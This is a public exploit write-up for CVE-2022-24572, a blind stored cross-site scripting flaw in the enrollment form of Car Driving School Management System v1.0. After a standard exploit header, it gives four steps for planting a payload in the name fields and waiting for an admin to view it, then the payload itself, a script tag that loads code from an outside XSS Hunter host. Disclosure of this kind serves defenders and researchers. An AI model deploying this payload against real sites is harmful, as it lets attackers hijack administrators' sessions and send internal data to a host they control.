Headline
CVE-2022-24572: OpenSource/exploit_xss at main · nsparker1337/OpenSource
Car Driving School Management System v1.0 is affected by Cross Site Scripting (XSS) in the User Enrollment Form (Username Field). To exploit this Vulnerability, an admin views the registered user details.
# Exploit Title: Car Driving School management System v1.0 - Blind Cross Site Scripting(XSS)
# Exploit Author: NS Kumar (n1_x)
# Date: January 31, 2022
# Vendor Homepage: https://www.sourcecodester.com/php/15070/car-driving-school-management-system-phpoop-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/cdsms_1.zip
# Tested on: Parrot Linux, Apache, Mysql
# Vendor: oretnom23
# Version: v1.0
# Exploit Description:
# Car Driving School management System v1.0 suffers from Blind XSS Injection Vulnerability allowing remote attackers to gain admin access and view internal IPs.
````````````````````````````````````````To Exploit````````````````````````````````````````````````````
Step 1: Goto Enrollment Page
Step 2: Put XSS Hunter Payload on Either First Name or Last Name field
Step 3: Wait for Admin to view your details
Step 4: Then you will see xss fires alert on xss hunter page
Payload Used for this Exploit: "><script src=https://d4.xss.ht></script>
```````````````````````````````````````````````````````````````````````````````````````````````````````